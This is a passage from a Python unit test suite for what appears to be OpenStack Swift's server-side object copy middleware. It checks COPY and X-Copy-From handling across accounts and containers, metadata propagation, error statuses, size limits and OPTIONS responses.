self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_leading_slash_and_slashes_in_x_copy_from_acct(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o/o2', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o/o2', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_no_object_in_x_copy_from(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_with_no_object_in_x_copy_from_and_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_with_bad_x_copy_from_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': '/i/am/bad'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_server_error_reading_source(self): 
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') def test_copy_server_error_reading_source_and_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_not_found_reading_source_and_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_with_object_metadata(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', 
environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Object-Meta-Ours': 'okay'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_object_metadata_and_account(self): self.app.register('GET', '/v1/a1/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Object-Meta-Ours': 'okay', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) with mock.patch('swift.common.middleware.copy.' 
'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_basic_COPY(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 'etag': 'is sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o-copy', self.authorized[1].path) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o-copy')]) self.assertIn('etag', self.app.headers[1]) self.assertEqual(self.app.headers[1]['etag'], 'is sent') # For basic test cases, assert orig_req_method behavior self.assertEqual(req.environ['swift.orig_req_method'], 'COPY') def test_basic_DLO(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 'x-object-manifest': 'some/path', 'etag': 'is not sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o-copy')]) self.assertNotIn('x-object-manifest', self.app.headers[1]) self.assertNotIn('etag', self.app.headers[1]) def test_basic_DLO_manifest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 
'x-object-manifest': 'some/path', 'etag': 'is sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o?multipart-manifest=get', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(2, len(self.app.calls)) self.assertEqual('GET', self.app.calls[0][0]) get_path, qs = self.app.calls[0][1].split('?') params = urllib.parse.parse_qs(qs) self.assertDictEqual( {'format': ['raw'], 'multipart-manifest': ['get']}, params) self.assertEqual(get_path, '/v1/a/c/o') self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o-copy')) self.assertIn('x-object-manifest', self.app.headers[1]) self.assertEqual(self.app.headers[1]['x-object-manifest'], 'some/path') self.assertIn('etag', self.app.headers[1]) self.assertEqual(self.app.headers[1]['etag'], 'is sent') def test_COPY_source_metadata(self): source_headers = { 'x-object-sysmeta-test1': 'copy me', 'x-object-meta-test2': 'copy me too', 'x-object-transient-sysmeta-test3': 'ditto', 'x-object-sysmeta-container-update-override-etag': 'etag val', 'x-object-sysmeta-container-update-override-size': 'size val', 'x-object-sysmeta-container-update-override-foo': 'bar', 'x-delete-at': 'delete-at-time'} get_resp_headers = source_headers.copy() get_resp_headers['etag'] = 'source etag' self.app.register( 'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers, body='passed') def verify_headers(expected_headers, unexpected_headers, actual_headers): for k, v in actual_headers: if k.lower() in expected_headers: expected_val = expected_headers.pop(k.lower()) self.assertEqual(expected_val, v) self.assertNotIn(k.lower(), unexpected_headers) self.assertFalse(expected_headers) # use a COPY request self.app.register('PUT', '/v1/a/c/o-copy0', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', 
headers={'Content-Length': 0, 'Destination': 'c/o-copy0'}) status, resp_headers, body = self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy0', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') req = Request.blank('/v1/a/c/o-copy0', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(source_headers.copy(), [], resp_headers) # use a COPY request with a Range header self.app.register('PUT', '/v1/a/c/o-copy1', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy1', 'Range': 'bytes=1-2'}) status, resp_headers, body = self.call_ssc(req) expected_headers = source_headers.copy() unexpected_headers = ( 'x-object-sysmeta-container-update-override-etag', 'x-object-sysmeta-container-update-override-size', 'x-object-sysmeta-container-update-override-foo') for h in unexpected_headers: expected_headers.pop(h) self.assertEqual('201 Created', status) verify_headers(expected_headers, unexpected_headers, resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy1', path) verify_headers( expected_headers, unexpected_headers, put_headers.items()) # etag should not be copied with a Range request self.assertNotIn('etag', put_headers) req = Request.blank('/v1/a/c/o-copy1', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(expected_headers, unexpected_headers, resp_headers) # use a PUT with x-copy-from self.app.register('PUT', '/v1/a/c/o-copy2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o-copy2', method='PUT', 
headers={'Content-Length': 0, 'X-Copy-From': 'c/o'}) status, resp_headers, body = self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy2', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') req = Request.blank('/v1/a/c/o-copy2', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(source_headers.copy(), [], resp_headers) # copy to same path as source self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='PUT', headers={'Content-Length': 0, 'X-Copy-From': 'c/o'}) status, resp_headers, body = self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') def test_COPY_no_destination_header(self): req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') self.assertEqual(len(self.authorized), 0) def test_basic_COPY_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c1/o2', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] 
self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o2', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o2', self.authorized[1].path) def test_COPY_across_containers(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c2/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c2/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c2/o', self.authorized[1].path) def test_COPY_source_with_slashes_in_name(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', 
self.authorized[1].path) def test_COPY_account_source_with_slashes_in_name(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 
Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_source_with_slashes_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_source_with_slashes_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) 
self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_no_object_in_destination(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c_o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_account_no_object_in_destination(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c_o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_account_bad_destination_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'Destination-Account': '/i/am/bad'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_server_error_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_server_error_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) 
self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_with_metadata(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed") self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'X-Object-Meta-Ours': 'okay'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_with_metadata(self): self.app.register('GET', '/v1/a/c/o', 
swob.HTTPOk, {}, "passed") self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'X-Object-Meta-Ours': 'okay', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_source_zero_content_length(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) with mock.patch('swift.common.middleware.copy.' 
'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_source_zero_content_length(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) with mock.patch('swift.common.middleware.copy.' 
'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_newest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'Last-Modified': '123'}, "passed") self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_newest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'Last-Modified': '123'}, "passed") self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_in_OPTIONS_response(self): self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk, {'Allow': 'GET, PUT'}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'OPTIONS'}, headers={}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '200 OK') calls = self.app.calls_with_headers method, 
path, req_headers = calls[0] self.assertEqual('OPTIONS', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('Allow', 'GET, PUT, COPY') in headers) self.assertEqual(len(self.authorized), 1) self.assertEqual('OPTIONS', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) # For basic test cases, assert orig_req_method behavior self.assertNotIn('swift.orig_req_method', req.environ) def test_COPY_in_OPTIONS_response_CORS(self): self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk, {'Allow': 'GET, PUT', 'Access-Control-Allow-Methods': 'GET, PUT'}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'OPTIONS'}, headers={}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '200 OK') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('OPTIONS', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('Allow', 'GET, PUT, COPY') in headers) self.assertTrue(('Access-Control-Allow-Methods', 'GET, PUT, COPY') in headers) self.assertEqual(len(self.authorized), 1) self.assertEqual('OPTIONS', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def _test_COPY_source_headers(self, extra_put_headers): # helper method to perform a COPY with some metadata headers that # should always be sent to the destination put_headers = {'Destination': '/c1/o', 'X-Object-Meta-Test2': 'added', 'X-Object-Sysmeta-Test2': 'added', 'X-Object-Transient-Sysmeta-Test2': 'added'} put_headers.update(extra_put_headers) get_resp_headers = { 'X-Timestamp': '1234567890.12345', 'X-Backend-Timestamp': '1234567890.12345', 'Content-Type': 'text/original', 'Content-Encoding': 'gzip', 'Content-Disposition': 'attachment; filename=myfile', 'X-Object-Meta-Test': 'original', 'X-Object-Sysmeta-Test': 'original', 'X-Object-Transient-Sysmeta-Test': 'original', 'X-Foo': 'Bar'} self.app.register( 'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers) self.app.register('PUT', 
